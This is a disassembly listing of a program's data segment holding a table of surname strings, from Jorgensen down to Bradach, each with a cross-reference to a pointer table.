aJorgensen db 'Jorgensen',0 ; DATA XREF: seg002:0043CD5C�o
align 4
aJolly db 'Jolly',0 ; DATA XREF: seg002:0043CD58�o
align 10h
aJohns db 'Johns',0 ; DATA XREF: seg002:0043CD54�o
align 4
aJohannsen db 'Johannsen',0 ; DATA XREF: seg002:0043CD50�o
align 4
aJohannesson db 'Johannesson',0 ; DATA XREF: seg002:0043CD4C�o
aJewett db 'Jewett',0 ; DATA XREF: seg002:0043CD48�o
align 4
aJespersen db 'Jespersen',0 ; DATA XREF: seg002:0043CD44�o
align 4
aJenkins db 'Jenkins',0 ; DATA XREF: seg002:0043CD40�o
aJellis db 'Jellis',0 ; DATA XREF: seg002:0043CD3C�o
align 4
aJeffers db 'Jeffers',0 ; DATA XREF: seg002:0043CD38�o
aJay db 'Jay',0 ; DATA XREF: seg002:0043CD34�o
aJarrell db 'Jarrell',0 ; DATA XREF: seg002:0043CD30�o
aJarnagin db 'Jarnagin',0 ; DATA XREF: seg002:0043CD2C�o
align 4
aJanjigian db 'Janjigian',0 ; DATA XREF: seg002:0043CD28�o
align 10h
aJamil db 'Jamil',0 ; DATA XREF: seg002:0043CD24�o
align 4
aJain db 'Jain',0 ; DATA XREF: seg002:0043CD20�o
align 10h
aJagoe db 'Jagoe',0 ; DATA XREF: seg002:0043CD1C�o
align 4
aJagger db 'Jagger',0 ; DATA XREF: seg002:0043CD18�o
align 10h
aJagers db 'Jagers',0 ; DATA XREF: seg002:0043CD14�o
align 4
aJackson db 'Jackson',0 ; DATA XREF: seg002:0043CD10�o
aJacenko db 'Jacenko',0 ; DATA XREF: seg002:0043CD0C�o
aIyer db 'Iyer',0 ; DATA XREF: seg002:0043CD08�o
align 10h
aIsserman db 'Isserman',0 ; DATA XREF: seg002:0043CD04�o
align 4
aIsbill db 'Isbill',0 ; DATA XREF: seg002:0043CD00�o
align 4
aIsaievych db 'Isaievych',0 ; DATA XREF: seg002:0043CCFC�o
align 10h
aIsaac db 'Isaac',0 ; DATA XREF: seg002:0043CCF8�o
align 4
aInniss db 'Inniss',0 ; DATA XREF: seg002:0043CCF4�o
align 10h
aInamura db 'Inamura',0 ; DATA XREF: seg002:0043CCF0�o
aIgarashi db 'Igarashi',0 ; DATA XREF: seg002:0043CCEC�o
align 4
aIchikawa db 'Ichikawa',0 ; DATA XREF: seg002:0043CCE8�o
align 10h
aIaquinta db 'Iaquinta',0 ; DATA XREF: seg002:0043CCE4�o
align 4
aHyde db 'Hyde',0 ; DATA XREF: seg002:0043CCE0�o
align 4
aHutchings db 'Hutchings',0 ; DATA XREF: seg002:0043CCDC�o
align 10h
aHurtubise db 'Hurtubise',0 ; DATA XREF: seg002:0043CCD8�o
align 4
aHupp db 'Hupp',0 ; DATA XREF: seg002:0043CCD4�o
align 4
aHuntington db 'Huntington',0 ; DATA XREF: seg002:0043CCD0�o
align 10h
aHungerford db 'Hungerford',0 ; DATA XREF: seg002:0043CCCC�o
align 4
aHuidekoper db 'Huidekoper',0 ; DATA XREF: seg002:0043CCC8�o
align 4
aHuey db 'Huey',0 ; DATA XREF: seg002:0043CCC4�o
align 10h
aHoy db 'Hoy',0 ; DATA XREF: seg002:0043CCC0�o
aHoward db 'Howard',0 ; DATA XREF: seg002:0043CCBC�o
align 4
aHottle db 'Hottle',0 ; DATA XREF: seg002:0043CCB8�o
align 4
aHostage db 'Hostage',0 ; DATA XREF: seg002:0043CCB4�o
aHoshida db 'Hoshida',0 ; DATA XREF: seg002:0043CCB0�o
aHorsley db 'Horsley',0 ; DATA XREF: seg002:0043CCAC�o
aHopkins db 'Hopkins',0 ; DATA XREF: seg002:0043CCA8�o
aHooker db 'Hooker',0 ; DATA XREF: seg002:0043CCA4�o
align 4
aHolzman db 'Holzman',0 ; DATA XREF: seg002:0043CCA0�o
aHolway db 'Holway',0 ; DATA XREF: seg002:0043CC9C�o
align 4
aHolter db 'Holter',0 ; DATA XREF: seg002:0043CC98�o
align 4
aHoloien db 'Holoien',0 ; DATA XREF: seg002:0043CC94�o
aHolmes db 'Holmes',0 ; DATA XREF: seg002:0043CC90�o
align 4
aHokoda db 'Hokoda',0 ; DATA XREF: seg002:0043CC8C�o
align 4
aHokanson db 'Hokanson',0 ; DATA XREF: seg002:0043CC88�o
align 4
aHoffman db 'Hoffman',0 ; DATA XREF: seg002:0043CC84�o
aHoffer db 'Hoffer',0 ; DATA XREF: seg002:0043CC80�o
align 4
aHock db 'Hock',0 ; DATA XREF: seg002:0043CC7C�o
align 10h
aHoang db 'Hoang',0 ; DATA XREF: seg002:0043CC78�o
align 4
aHitchcock db 'Hitchcock',0 ; DATA XREF: seg002:0043CC74�o
align 4
aHirst db 'Hirst',0 ; DATA XREF: seg002:0043CC70�o
align 4
aHind db 'Hind',0 ; DATA XREF: seg002:0043CC6C�o
align 4
aHimmelfarb db 'Himmelfarb',0 ; DATA XREF: seg002:0043CC68�o
align 10h
aHeyeck db 'Heyeck',0 ; DATA XREF: seg002:0043CC64�o
align 4
aHeubert db 'Heubert',0 ; DATA XREF: seg002:0043CC60�o
aHester db 'Hester',0 ; DATA XREF: seg002:0043CC5C�o
align 4
aHerrera db 'Herrera',0 ; DATA XREF: seg002:0043CC58�o
aHernandez db 'Hernandez',0 ; DATA XREF: seg002:0043CC54�o
align 4
aHenrichs db 'Henrichs',0 ; DATA XREF: seg002:0043CC50�o
align 4
aHenery db 'Henery',0 ; DATA XREF: seg002:0043CC4C�o
align 10h
aHemphill db 'Hemphill',0 ; DATA XREF: seg002:0043CC48�o
align 4
aHelprin db 'Helprin',0 ; DATA XREF: seg002:0043CC44�o
aHellmiss db 'Hellmiss',0 ; DATA XREF: seg002:0043CC40�o
align 10h
aHellman db 'Hellman',0 ; DATA XREF: seg002:0043CC3C�o
aHeiland db 'Heiland',0 ; DATA XREF: seg002:0043CC38�o
aHeft db 'Heft',0 ; DATA XREF: seg002:0043CC34�o
align 4
aHeermans db 'Heermans',0 ; DATA XREF: seg002:0043CC30�o
align 4
aHazlewood db 'Hazlewood',0 ; DATA XREF: seg002:0043CC2C�o
align 10h
aHaynes db 'Haynes',0 ; DATA XREF: seg002:0043CC28�o
align 4
aHayes db 'Hayes',0 ; DATA XREF: seg002:0043CC24�o
align 10h
aHawkes db 'Hawkes',0 ; DATA XREF: seg002:0043CC20�o
align 4
aHaviaras db 'Haviaras',0 ; DATA XREF: seg002:0043CC1C�o
align 4
aHarwell db 'Harwell',0 ; DATA XREF: seg002:0043CC18�o
aHartnett db 'Hartnett',0 ; DATA XREF: seg002:0043CC14�o
align 4
aHartmann db 'Hartmann',0 ; DATA XREF: seg002:0043CC10�o
align 4
aHartman db 'Hartman',0 ; DATA XREF: seg002:0043CC0C�o
aHarrigan db 'Harrigan',0 ; DATA XREF: seg002:0043CC08�o
align 4
aHarlow db 'Harlow',0 ; DATA XREF: seg002:0043CC04�o
align 10h
aHargraves db 'Hargraves',0 ; DATA XREF: seg002:0043CC00�o
align 4
aHarding db 'Harding',0 ; DATA XREF: seg002:0043CBFC�o
aHanssen db 'Hanssen',0 ; DATA XREF: seg002:0043CBF8�o
aHand db 'Hand',0 ; DATA XREF: seg002:0043CBF4�o
align 4
aHammerness db 'Hammerness',0 ; DATA XREF: seg002:0043CBF0�o
align 10h
aHamer db 'Hamer',0 ; DATA XREF: seg002:0043CBEC�o
align 4
aHambarzumjan db 'Hambarzumjan',0 ; DATA XREF: seg002:0043CBE8�o
align 4
aHalpert db 'Halpert',0 ; DATA XREF: seg002:0043CBE4�o
aHallowell db 'Hallowell',0 ; DATA XREF: seg002:0043CBE0�o
align 4
aHalkias db 'Halkias',0 ; DATA XREF: seg002:0043CBDC�o
aHaley db 'Haley',0 ; DATA XREF: seg002:0043CBD8�o
align 4
aHackshaw db 'Hackshaw',0 ; DATA XREF: seg002:0043CBD4�o
align 4
aHackman db 'Hackman',0 ; DATA XREF: seg002:0043CBD0�o
aHaar db 'Haar',0 ; DATA XREF: seg002:0043CBCC�o
align 4
aHa db 'Ha',0 ; DATA XREF: seg002:0043CBC8�o
align 4
aGuo db 'Guo',0 ; DATA XREF: seg002:0043CBC4�o
aGunn db 'Gunn',0 ; DATA XREF: seg002:0043CBC0�o
align 4
aGuenthart db 'Guenthart',0 ; DATA XREF: seg002:0043CBBC�o
align 4
aGruppe db 'Gruppe',0 ; DATA XREF: seg002:0043CBB8�o
align 4
aGruner db 'Gruner',0 ; DATA XREF: seg002:0043CBB4�o
align 4
aGrummell db 'Grummell',0 ; DATA XREF: seg002:0043CBB0�o
align 10h
aGrigoletto db 'Grigoletto',0 ; DATA XREF: seg002:0043CBAC�o
align 4
aGriffiths db 'Griffiths',0 ; DATA XREF: seg002:0043CBA8�o
align 4
aGreenfeld db 'Greenfeld',0 ; DATA XREF: seg002:0043CBA4�o
align 4
aGreenberg db 'Greenberg',0 ; DATA XREF: seg002:0043CBA0�o
align 10h
aGravell db 'Gravell',0 ; DATA XREF: seg002:0043CB9C�o
aGozzi db 'Gozzi',0 ; DATA XREF: seg002:0043CB98�o
align 10h
aGoody db 'Goody',0 ; DATA XREF: seg002:0043CB94�o
align 4
aGoodearl db 'Goodearl',0 ; DATA XREF: seg002:0043CB90�o
align 4
aGood db 'Good',0 ; DATA XREF: seg002:0043CB8C�o
align 4
aGoncalves db 'Goncalves',0 ; DATA XREF: seg002:0043CB88�o
align 4
aGoldfarb db 'Goldfarb',0 ; DATA XREF: seg002:0043CB84�o
align 4
aGlendon db 'Glendon',0 ; DATA XREF: seg002:0043CB80�o
aGlegg db 'Glegg',0 ; DATA XREF: seg002:0043CB7C�o
align 4
aGleason db 'Gleason',0 ; DATA XREF: seg002:0043CB78�o
aGist db 'Gist',0 ; DATA XREF: seg002:0043CB74�o
align 4
aGillispie db 'Gillispie',0 ; DATA XREF: seg002:0043CB70�o
align 10h
aGill db 'Gill',0 ; DATA XREF: seg002:0043CB6C�o
align 4
aGili db 'Gili',0 ; DATA XREF: seg002:0043CB68�o
align 10h
aGilbert db 'Gilbert',0 ; DATA XREF: seg002:0043CB64�o
aGibson db 'Gibson',0 ; DATA XREF: seg002:0043CB60�o
align 10h
aGibbens db 'Gibbens',0 ; DATA XREF: seg002:0043CB5C�o
aGhorai db 'Ghorai',0 ; DATA XREF: seg002:0043CB58�o
align 10h
aGerrett db 'Gerrett',0 ; DATA XREF: seg002:0043CB54�o
aGeorgi db 'Georgi',0 ; DATA XREF: seg002:0043CB50�o
align 10h
aGemberling db 'Gemberling',0 ; DATA XREF: seg002:0043CB4C�o
align 4
aGeller db 'Geller',0 ; DATA XREF: seg002:0043CB48�o
align 4
aGaronna db 'Garonna',0 ; DATA XREF: seg002:0043CB44�o
aGarman db 'Garman',0 ; DATA XREF: seg002:0043CB40�o
align 4
aGarfield db 'Garfield',0 ; DATA XREF: seg002:0043CB3C�o
align 10h
aGambini db 'Gambini',0 ; DATA XREF: seg002:0043CB38�o
aGalwey db 'Galwey',0 ; DATA XREF: seg002:0043CB34�o
align 10h
aGaleotti db 'Galeotti',0 ; DATA XREF: seg002:0043CB30�o
align 4
aGaggiotti db 'Gaggiotti',0 ; DATA XREF: seg002:0043CB2C�o
align 4
aGabrielli db 'Gabrielli',0 ; DATA XREF: seg002:0043CB28�o
align 4
aFusaro db 'Fusaro',0 ; DATA XREF: seg002:0043CB24�o
align 4
aFurth db 'Furth',0 ; DATA XREF: seg002:0043CB20�o
align 4
aFuller db 'Fuller',0 ; DATA XREF: seg002:0043CB1C�o
align 4
aFujiiAbe db 'Fujii-Abe',0 ; DATA XREF: seg002:0043CB18�o
align 4
aFrye db 'Frye',0 ; DATA XREF: seg002:0043CB14�o
align 10h
aFryberger db 'Fryberger',0 ; DATA XREF: seg002:0043CB10�o
align 4
aFrowiss db 'Frowiss',0 ; DATA XREF: seg002:0043CB0C�o
aFrisken db 'Frisken',0 ; DATA XREF: seg002:0043CB08�o
aFriedland db 'Friedland',0 ; DATA XREF: seg002:0043CB04�o
align 4
aFried db 'Fried',0 ; DATA XREF: seg002:0043CB00�o
align 10h
aFreundlich db 'Freundlich',0 ; DATA XREF: seg002:0043CAFC�o
align 4
aFreid db 'Freid',0 ; DATA XREF: seg002:0043CAF8�o
align 4
aFrazierDavis db 'Frazier-Davis',0 ; DATA XREF: seg002:0043CAF4�o
align 4
aFranz db 'Franz',0 ; DATA XREF: seg002:0043CAF0�o
align 4
aFranklinKenea db 'Franklin-Kenea',0 ; DATA XREF: seg002:0043CAEC�o
align 4
aFrancisco db 'Francisco',0 ; DATA XREF: seg002:0043CAE8�o
align 4
aFossi db 'Fossi',0 ; DATA XREF: seg002:0043CAE4�o
align 10h
aFossey db 'Fossey',0 ; DATA XREF: seg002:0043CAE0�o
align 4
aFortier db 'Fortier',0 ; DATA XREF: seg002:0043CADC�o
aFortes db 'Fortes',0 ; DATA XREF: seg002:0043CAD8�o
align 4
aForester db 'Forester',0 ; DATA XREF: seg002:0043CAD4�o
align 4
aFolks db 'Folks',0 ; DATA XREF: seg002:0043CAD0�o
align 4
aFlores db 'Flores',0 ; DATA XREF: seg002:0043CACC�o
align 4
aFlier db 'Flier',0 ; DATA XREF: seg002:0043CAC8�o
align 4
aFitzmaurice db 'Fitzmaurice',0 ; DATA XREF: seg002:0043CAC4�o
aFisk db 'Fisk',0 ; DATA XREF: seg002:0043CAC0�o
align 10h
aFiorina db 'Fiorina',0 ; DATA XREF: seg002:0043CABC�o
aFinnegan db 'Finnegan',0 ; DATA XREF: seg002:0043CAB8�o
align 4
aFinkelstein db 'Finkelstein',0 ; DATA XREF: seg002:0043CAB4�o
aFink db 'Fink',0 ; DATA XREF: seg002:0043CAB0�o
align 4
aField db 'Field',0 ; DATA XREF: seg002:0043CAAC�o
align 10h
aFido db 'Fido',0 ; DATA XREF: seg002:0043CAA8�o
align 4
aFeuer db 'Feuer',0 ; DATA XREF: seg002:0043CAA4�o
align 10h
aFerriell db 'Ferriell',0 ; DATA XREF: seg002:0043CAA0�o
align 4
aFerrante db 'Ferrante',0 ; DATA XREF: seg002:0043CA9C�o
align 4
aFernandes db 'Fernandes',0 ; DATA XREF: seg002:0043CA98�o
align 4
aFernald db 'Fernald',0 ; DATA XREF: seg002:0043CA94�o
aFeldman db 'Feldman',0 ; DATA XREF: seg002:0043CA90�o
aFejzo db 'Fejzo',0 ; DATA XREF: seg002:0043CA8C�o
align 4
aFeigenbaum db 'Feigenbaum',0 ; DATA XREF: seg002:0043CA88�o
align 4
aFates db 'Fates',0 ; DATA XREF: seg002:0043CA84�o
align 10h
aFasso db 'Fasso',27h,0 ; DATA XREF: seg002:0043CA80�o
align 4
aFarren db 'Farren',0 ; DATA XREF: seg002:0043CA7C�o
align 10h
aFarone db 'Farone',0 ; DATA XREF: seg002:0043CA78�o
align 4
aFaris db 'Faris',0 ; DATA XREF: seg002:0043CA74�o
align 10h
aFalorsi db 'Falorsi',0 ; DATA XREF: seg002:0043CA70�o
aFalcoAcosta db 'Falco-Acosta',0 ; DATA XREF: seg002:0043CA6C�o
align 4
aFaioes db 'Faioes',0 ; DATA XREF: seg002:0043CA68�o
align 10h
aFagan db 'Fagan',0 ; DATA XREF: seg002:0043CA64�o
align 4
aFabbris db 'Fabbris',0 ; DATA XREF: seg002:0043CA60�o
aEverett db 'Everett',0 ; DATA XREF: seg002:0043CA5C�o
aEuripides db 'Euripides',0 ; DATA XREF: seg002:0043CA58�o
align 4
aEtter db 'Etter',0 ; DATA XREF: seg002:0043CA54�o
align 4
aEstes db 'Estes',0 ; DATA XREF: seg002:0043CA50�o
align 4
aEspinoza db 'Espinoza',0 ; DATA XREF: seg002:0043CA4C�o
align 10h
aErez db 'Erez',0 ; DATA XREF: seg002:0043CA48�o
align 4
aErdos db 'Erdos',0 ; DATA XREF: seg002:0043CA44�o
align 10h
aErdman db 'Erdman',0 ; DATA XREF: seg002:0043CA40�o
align 4
aErbach db 'Erbach',0 ; DATA XREF: seg002:0043CA3C�o
align 10h
aEppling db 'Eppling',0 ; DATA XREF: seg002:0043CA38�o
aEnyeart db 'Enyeart',0 ; DATA XREF: seg002:0043CA34�o
aEncinas db 'Encinas',0 ; DATA XREF: seg002:0043CA30�o
aElvis db 'Elvis',0 ; DATA XREF: seg002:0043CA2C�o
align 10h
aElmerick db 'Elmerick',0 ; DATA XREF: seg002:0043CA28�o
align 4
aElmendorf db 'Elmendorf',0 ; DATA XREF: seg002:0043CA24�o
align 4
aEliasson db 'Eliasson',0 ; DATA XREF: seg002:0043CA20�o
align 4
aEickenhorst db 'Eickenhorst',0 ; DATA XREF: seg002:0043CA1C�o
aEdward db 'Edward',0 ; DATA XREF: seg002:0043CA18�o
align 4
aEdner db 'Edner',0 ; DATA XREF: seg002:0043CA14�o
align 10h
aEdley db 'Edley',0 ; DATA XREF: seg002:0043CA10�o
align 4
aEckel db 'Eckel',0 ; DATA XREF: seg002:0043CA0C�o
align 10h
aEbeling db 'Ebeling',0 ; DATA XREF: seg002:0043CA08�o
aEardley db 'Eardley',0 ; DATA XREF: seg002:0043CA04�o
aDwyer db 'Dwyer',0 ; DATA XREF: seg002:0043CA00�o
align 4
aDussault db 'Dussault',0 ; DATA XREF: seg002:0043C9FC�o
align 4
aDurrett db 'Durrett',0 ; DATA XREF: seg002:0043C9F8�o
aDuffin db 'Duffin',0 ; DATA XREF: seg002:0043C9F4�o
align 4
aDSouza db 'D',27h,'souza',0 ; DATA XREF: seg002:0043C9F0�o
aDrinker db 'Drinker',0 ; DATA XREF: seg002:0043C9EC�o
aDowsland db 'Dowsland',0 ; DATA XREF: seg002:0043C9E8�o
align 10h
aDoug db 'Doug',0 ; DATA XREF: seg002:0043C9E4�o
align 4
aDoty db 'Doty',0 ; DATA XREF: seg002:0043C9E0�o
align 10h
aDosi db 'Dosi',0 ; DATA XREF: seg002:0043C9DC�o
align 4
aDorf db 'Dorf',0 ; DATA XREF: seg002:0043C9D8�o
align 10h
aDore db 'Dore',0 ; DATA XREF: seg002:0043C9D4�o
align 4
aDoonan db 'Doonan',0 ; DATA XREF: seg002:0043C9D0�o
align 10h
aDonner db 'Donner',0 ; DATA XREF: seg002:0043C9CC�o
align 4
aDonahue db 'Donahue',0 ; DATA XREF: seg002:0043C9C8�o
aDoherty db 'Doherty',0 ; DATA XREF: seg002:0043C9C4�o
aDockery db 'Dockery',0 ; DATA XREF: seg002:0043C9C0�o
aDirksen db 'Dirksen',0 ; DATA XREF: seg002:0043C9BC�o
aDionysius db 'Dionysius',0 ; DATA XREF: seg002:0043C9B8�o
align 4
aDilworth db 'Dilworth',0 ; DATA XREF: seg002:0043C9B4�o
align 10h
aDifronzo db 'Difronzo',0 ; DATA XREF: seg002:0043C9B0�o
align 4
aDifabio db 'Difabio',0 ; DATA XREF: seg002:0043C9AC�o
aDiefenbach db 'Diefenbach',0 ; DATA XREF: seg002:0043C9A8�o
align 10h
aDicks db 'Dicks',0 ; DATA XREF: seg002:0043C9A4�o
align 4
aDFini db 'D',27h,'fini',0 ; DATA XREF: seg002:0043C9A0�o
align 10h
aDeutsch db 'Deutsch',0 ; DATA XREF: seg002:0043C99C�o
aDesombre db 'Desombre',0 ; DATA XREF: seg002:0043C998�o
align 4
aDenison db 'Denison',0 ; DATA XREF: seg002:0043C994�o
aDenham db 'Denham',0 ; DATA XREF: seg002:0043C990�o
align 4
aDenault db 'Denault',0 ; DATA XREF: seg002:0043C98C�o
aDemusz db 'Demusz',0 ; DATA XREF: seg002:0043C988�o
align 4
aDempster db 'Dempster',0 ; DATA XREF: seg002:0043C984�o
align 10h
aDeming db 'Deming',0 ; DATA XREF: seg002:0043C980�o
align 4
aDellAcqua db 'Dell',27h,'acqua',0 ; DATA XREF: seg002:0043C97C�o
align 4
aDelger db 'Delger',0 ; DATA XREF: seg002:0043C978�o
align 4
aDeleonRendon db 'Deleon-Rendon',0 ; DATA XREF: seg002:0043C974�o
align 4
aDelattre db 'Delattre',0 ; DATA XREF: seg002:0043C970�o
align 4
aDefeciani db 'Defeciani',0 ; DATA XREF: seg002:0043C96C�o
align 4
aDees db 'Dees',0 ; DATA XREF: seg002:0043C968�o
align 4
aDebroff db 'Debroff',0 ; DATA XREF: seg002:0043C964�o
aDerousse db 'deRousse',0 ; DATA XREF: seg002:0043C960�o
align 10h
aDelEnclos db 'del',27h,'Enclos',0 ; DATA XREF: seg002:0043C95C�o
align 4
aDelapena db 'DeLaPena',0 ; DATA XREF: seg002:0043C958�o
align 4
aDegennaro db 'DeGennaro',0 ; DATA XREF: seg002:0043C954�o
align 4
aDawkins db 'Dawkins',0 ; DATA XREF: seg002:0043C950�o
aDavid db 'David',0 ; DATA XREF: seg002:0043C94C�o
align 4
aDaskalu db 'Daskalu',0 ; DATA XREF: seg002:0043C948�o
aDasgupta db 'Dasgupta',0 ; DATA XREF: seg002:0043C944�o
align 4
aDas db 'Das',0 ; DATA XREF: seg002:0043C940�o
aDArcangelo db 'D',27h,'arcangelo',0 ; DATA XREF: seg002:0043C93C�o
aDapice db 'Dapice',0 ; DATA XREF: seg002:0043C938�o
align 10h
aDante db 'Dante',0 ; DATA XREF: seg002:0043C934�o
align 4
aDanieli db 'Danieli',0 ; DATA XREF: seg002:0043C930�o
aDAmbra db 'D',27h,'Ambra',0 ; DATA XREF: seg002:0043C92C�o
aDaly db 'Daly',0 ; DATA XREF: seg002:0043C928�o
align 10h
aDaldalian db 'Daldalian',0 ; DATA XREF: seg002:0043C924�o
align 4
aDasilva db 'daSilva',0 ; DATA XREF: seg002:0043C920�o
aCyders db 'Cyders',0 ; DATA XREF: seg002:0043C91C�o
align 4
aCvek db 'Cvek',0 ; DATA XREF: seg002:0043C918�o
align 4
aCutler db 'Cutler',0 ; DATA XREF: seg002:0043C914�o
align 4
aCurrier db 'Currier',0 ; DATA XREF: seg002:0043C910�o
aCui db 'Cui',0 ; DATA XREF: seg002:0043C90C�o
aCroxton db 'Croxton',0 ; DATA XREF: seg002:0043C908�o
aCroxen db 'Croxen',0 ; DATA XREF: seg002:0043C904�o
align 4
aCroshaw db 'Croshaw',0 ; DATA XREF: seg002:0043C900�o
aCrocker db 'Crocker',0 ; DATA XREF: seg002:0043C8FC�o
aCrawford db 'Crawford',0 ; DATA XREF: seg002:0043C8F8�o
align 4
aCoutaux db 'Coutaux',0 ; DATA XREF: seg002:0043C8F4�o
aCounter db 'Counter',0 ; DATA XREF: seg002:0043C8F0�o
aCosmides db 'Cosmides',0 ; DATA XREF: seg002:0043C8EC�o
align 10h
aCornish db 'Cornish',0 ; DATA XREF: seg002:0043C8E8�o
aCorey db 'Corey',0 ; DATA XREF: seg002:0043C8E4�o
align 10h
aConnors db 'Connors',0 ; DATA XREF: seg002:0043C8E0�o
aCondodina db 'Condodina',0 ; DATA XREF: seg002:0043C8DC�o
align 4
aConcino db 'Concino',0 ; DATA XREF: seg002:0043C8D8�o
aComstock db 'Comstock',0 ; DATA XREF: seg002:0043C8D4�o
align 4
aCompton db 'Compton',0 ; DATA XREF: seg002:0043C8CC�o
; seg002:0043C8D0�o
aCollis db 'Collis',0 ; DATA XREF: seg002:0043C8C8�o
align 4
aCollard db 'Collard',0 ; DATA XREF: seg002:0043C8C4�o
aColella db 'Colella',0 ; DATA XREF: seg002:0043C8C0�o
aColdren db 'Coldren',0 ; DATA XREF: seg002:0043C8BC�o
aCoito db 'Coito',0 ; DATA XREF: seg002:0043C8B8�o
align 4
aCoblenz db 'Coblenz',0 ; DATA XREF: seg002:0043C8B4�o
aClow db 'Clow',0 ; DATA XREF: seg002:0043C8B0�o
align 4
aClifton db 'Clifton',0 ; DATA XREF: seg002:0043C8AC�o
aClement db 'Clement',0 ; DATA XREF: seg002:0043C8A8�o
aClark db 'Clark',0 ; DATA XREF: seg002:0043C8A4�o
align 10h
aClancy db 'Clancy',0 ; DATA XREF: seg002:0043C8A0�o
align 4
aClaffey db 'Claffey',0 ; DATA XREF: seg002:0043C89C�o
aCifarelli db 'Cifarelli',0 ; DATA XREF: seg002:0043C898�o
align 4
aCicero db 'Cicero',0 ; DATA XREF: seg002:0043C894�o
align 4
aCiampaglia db 'Ciampaglia',0 ; DATA XREF: seg002:0043C890�o
align 10h
aChurch db 'Church',0 ; DATA XREF: seg002:0043C88C�o
align 4
aChupasko db 'Chupasko',0 ; DATA XREF: seg002:0043C888�o
align 4
aChu db 'Chu',0 ; DATA XREF: seg002:0043C884�o
aChristopher db 'Christopher',0 ; DATA XREF: seg002:0043C880�o
aChristie db 'Christie',0 ; DATA XREF: seg002:0043C87C�o
align 10h
aChristiano db 'Christiano',0 ; DATA XREF: seg002:0043C878�o
align 4
aChristian db 'Christian',0 ; DATA XREF: seg002:0043C874�o
align 4
aChristenson db 'Christenson',0 ; DATA XREF: seg002:0043C870�o
aChinman db 'Chinman',0 ; DATA XREF: seg002:0043C86C�o
aChinipardaz db 'Chinipardaz',0 ; DATA XREF: seg002:0043C868�o
aChilds db 'Childs',0 ; DATA XREF: seg002:0043C864�o
align 10h
aChildress db 'Childress',0 ; DATA XREF: seg002:0043C860�o
align 4
aChien db 'Chien',0 ; DATA XREF: seg002:0043C85C�o
align 4
aChiassino db 'Chiassino',0 ; DATA XREF: seg002:0043C858�o
align 10h
aChervinsky db 'Chervinsky',0 ; DATA XREF: seg002:0043C854�o
align 4
aCherry db 'Cherry',0 ; DATA XREF: seg002:0043C850�o
align 4
aCheang db 'Cheang',0 ; DATA XREF: seg002:0043C84C�o
align 4
aCharles db 'Charles',0 ; DATA XREF: seg002:0043C848�o
aChapman db 'Chapman',0 ; DATA XREF: seg002:0043C844�o
aCerioli db 'Cerioli',0 ; DATA XREF: seg002:0043C840�o
aCeniceros db 'Ceniceros',0 ; DATA XREF: seg002:0043C83C�o
align 10h
aCavell db 'Cavell',0 ; DATA XREF: seg002:0043C838�o
align 4
aCavanagh db 'Cavanagh',0 ; DATA XREF: seg002:0043C834�o
align 4
aCastelda db 'Castelda',0 ; DATA XREF: seg002:0043C830�o
align 10h
aCaspar db 'Caspar',0 ; DATA XREF: seg002:0043C82C�o
align 4
aCase db 'Case',0 ; DATA XREF: seg002:0043C828�o
align 10h
aCascio db 'Cascio',0 ; DATA XREF: seg002:0043C824�o
align 4
aCartmill db 'Cartmill',0 ; DATA XREF: seg002:0043C820�o
align 4
aCarper db 'Carper',0 ; DATA XREF: seg002:0043C81C�o
align 4
aCaroti db 'Caroti',0 ; DATA XREF: seg002:0043C818�o
align 4
aCarmichael db 'Carmichael',0 ; DATA XREF: seg002:0043C814�o
align 10h
aCarlyle db 'Carlyle',0 ; DATA XREF: seg002:0043C810�o
aCarlos db 'Carlos',0 ; DATA XREF: seg002:0043C80C�o
align 10h
aCarlin db 'Carlin',0 ; DATA XREF: seg002:0043C808�o
align 4
aCarayannopoulo db 'Carayannopoulos',0 ; DATA XREF: seg002:0043C804�o
aCaratozzolo db 'Caratozzolo',0 ; DATA XREF: seg002:0043C800�o
aCapursi db 'Capursi',0 ; DATA XREF: seg002:0043C7FC�o
aCappuccio db 'Cappuccio',0 ; DATA XREF: seg002:0043C7F8�o
align 4
aCapodilupo db 'Capodilupo',0 ; DATA XREF: seg002:0043C7F4�o
align 4
aCapocaccia db 'Capocaccia',0 ; DATA XREF: seg002:0043C7F0�o
align 10h
aCaperton db 'Caperton',0 ; DATA XREF: seg002:0043C7EC�o
align 4
aCapanni db 'Capanni',0 ; DATA XREF: seg002:0043C7E8�o
aCanley db 'Canley',0 ; DATA XREF: seg002:0043C7E4�o
align 4
aCammilleri db 'Cammilleri',0 ; DATA XREF: seg002:0043C7E0�o
align 4
aCammelli db 'Cammelli',0 ; DATA XREF: seg002:0043C7DC�o
align 4
aCalnan db 'Calnan',0 ; DATA XREF: seg002:0043C7D8�o
align 4
aCage db 'Cage',0 ; DATA XREF: seg002:0043C7D4�o
align 4
aByrd db 'Byrd',0 ; DATA XREF: seg002:0043C7D0�o
align 4
aByerly db 'Byerly',0 ; DATA XREF: seg002:0043C7CC�o
align 4
aByatt db 'Byatt',0 ; DATA XREF: seg002:0043C7C8�o
align 4
aBusetta db 'Busetta',0 ; DATA XREF: seg002:0043C7C4�o
aBurridge db 'Burridge',0 ; DATA XREF: seg002:0043C7C0�o
align 10h
aBurke db 'Burke',0 ; DATA XREF: seg002:0043C7BC�o
align 4
aBurdzy db 'Burdzy',0 ; DATA XREF: seg002:0043C7B8�o
align 10h
aBurden db 'Burden',0 ; DATA XREF: seg002:0043C7B4�o
align 4
aBunton db 'Bunton',0 ; DATA XREF: seg002:0043C7B0�o
align 10h
aBullard db 'Bullard',0 ; DATA XREF: seg002:0043C7AC�o
aBudding db 'Budding',0 ; DATA XREF: seg002:0043C7A8�o
aBuchan db 'Buchan',0 ; DATA XREF: seg002:0043C7A4�o
align 4
aBrzycki db 'Brzycki',0 ; DATA XREF: seg002:0043C7A0�o
aBrook db 'Brook',0 ; DATA XREF: seg002:0043C79C�o
align 4
aBroca db 'Broca',0 ; DATA XREF: seg002:0043C798�o
align 10h
aBritz db 'Britz',0 ; DATA XREF: seg002:0043C794�o
align 4
aBrinton db 'Brinton',0 ; DATA XREF: seg002:0043C790�o
aBridges db 'Bridges',0 ; DATA XREF: seg002:0043C78C�o
aBridgeman db 'Bridgeman',0 ; DATA XREF: seg002:0043C788�o
align 4
aBrewer db 'Brewer',0 ; DATA XREF: seg002:0043C780�o
; seg002:0043C784�o
align 4
aBrennan db 'Brennan',0 ; DATA XREF: seg002:0043C77C�o
aBrenan db 'Brenan',0 ; DATA XREF: seg002:0043C778�o
align 4
aBreed db 'Breed',0 ; DATA XREF: seg002:0043C774�o
align 4
aBrecht db 'Brecht',0 ; DATA XREF: seg002:0043C770�o
align 4
aBradach db 'Bradach',0 ; DATA XREF: seg002:0043C76C�o
